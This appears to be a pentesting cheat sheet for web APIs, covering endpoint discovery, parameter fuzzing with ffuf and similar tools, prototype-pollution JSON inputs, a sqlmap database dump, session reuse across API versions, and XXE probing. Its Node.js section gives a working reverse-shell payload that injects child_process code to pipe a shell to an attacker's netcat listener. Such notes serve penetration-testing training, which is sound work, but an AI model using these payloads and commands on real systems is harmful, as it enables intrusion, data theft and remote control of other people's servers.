API Pentesting
Last modified: 2023-07-09
Application Programming Interface (API) is for communicating with each computer. There are several types such as Web API, REST API, RESTful API.
Change Methods
# Methods
GET, POST, PUT, DELETE, OPTIONS, HEAD, PATCH, INVENTED
Endpoint Discovery
Try to enumerate endpoints while changing HTTP methods like GET, POST, OPTIONS, etc.
/api/?xml
/api?xml
/api/v1?xml
/api/v1/user?xml
# Web Service Description Language
/api/?wsdl
# Versions
/api/v1/user
/api/v2/user
/api/v3/user
# Wildcards
/api/v2/user/*
/api/v2/user/posts/*
/api/v2/users/*
# Path traversal
/api/v1/post/..\private
Automation
# Dirb
dirb https://vulnerable.com/ endpoints.txt
# Ffuf
ffuf -u https://vulnerable.com/FUZZ -w endpoints.txt
ffuf -u https://vulnerable.com/FUZZ -X POST -w endpoints.txt
ffuf -u https://vulnerable.com/api/FUZZ -w wordlist.txt
ffuf -u https://example.com/api/?FUZZ=test -w wordlist.txt
# Gobuster
gobuster dir -u https://vulnerable.com/ -w endpoints.txt
# Kiterunner
# -A: wordlist type (ex. first 20000 words)
# -x: max connection per host (default: 3)
kr scan https://vulnerable.com/api -A=apiroutes-210228:20000 -x 10
kr scan https://vulnerable.com/api -A=apiroutes-210228:20000 -x 10 --fail-status-codes 401,404
kr scan https://vulnerable.com:8443/api -A=apiroutes-210228:20000 -x 10
This wordlist is useful for endpoints.
GET Parameters
/api/v1/user?id=test
/api/v1/user?name=test
/api/v1/user?uuid=test
/api/v1/status?live=test
/api/v1/status?verbose=test
Parameter Fuzzing
# Key
ffuf -u https://vulnerable.com/api/items?FUZZ=test -w wordlist.txt
ffuf -u https://vulnerable.com/api/items?FUZZ=test -w wordlist.txt -fs 120
ffuf -X POST -u https://vulnerable.com/api/items?FUZZ=test -w wordlist.txt
ffuf -X POST -u https://vulnerable.com/api/items?FUZZ=test -w wordlist.txt -fs 120
# Value
ffuf -u https://vulenrable.com/api/items?test=FUZZ -w wordlist.xt
ffuf -u https://vulnerable.com/api/items?test=FUZZ -w wordlist.txt -fs 120
ffuf -X POST -u https://vulnerable.com/api/items?test=FUZZ -w wordlist.txt
ffuf -X POST -u https://vulnerable.com/api/items?test=FUZZ -w wordlist.txt -fs 120
Sending Unexpected Data
We might be able to find anything by sending unexpected data on POST or PUT method.
{"email": "test@test.com"}
{"email": true}
{"email": 1}
{"email": -1}
{"email": ["test@test.com", true]}
{"email": {"admin": true}}
// Prototype Pollution
{"email": "test@test.com", "__proto__": {"admin": true}}
{"email": {"__proto__": {"admin": true}}}
XSS
If we can send post (or put) requests to API endpoints, we may be able to insert payloads and the result will be reflected as the output.
XSS can be used for this exploitation.
SQL Injection
sqlmap -u http://vulnerable.com/api/v2/fetch/?post=1 --dump --batch
Node.js Remote Code Execution (RCE)
If the website uses the Node (e.g. Express), we may be able to execute the JavaScript function.
# Get current working directory in the website
/api/?key=process.cwd()
Reverse Shell
We may be able to execute reverse shell using "child_process".
First off, start listener for getting a shell in local machine.
nc -lvnp 4444
Then send request to the website with the parameter which executes reverse shell using child_process.
/api/?key=require('child_process').exec('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local-ip> 4444 >/tmp/f')
We should see that we get a shell in local terminal.
Same Session Across Multiple Versions and Instances
For example, assumed the website has two endpoints such as "/api/v1/user/login", "/api/v2/user/login".
"v1" uses "X-Token" and "v2" uses "X-Session".
After login to "v1", you may be able to get access "v2" using the session key/value of "v1".
X-Token: fc38ab5f5ae41072778d852023f9ee26
X-Session: fc38ab5f5ae41072778d852023f9ee26
XXE
GET /api/product/1?xml HTTP/1.1
If the website displays the response in XML, we might be able to XXE.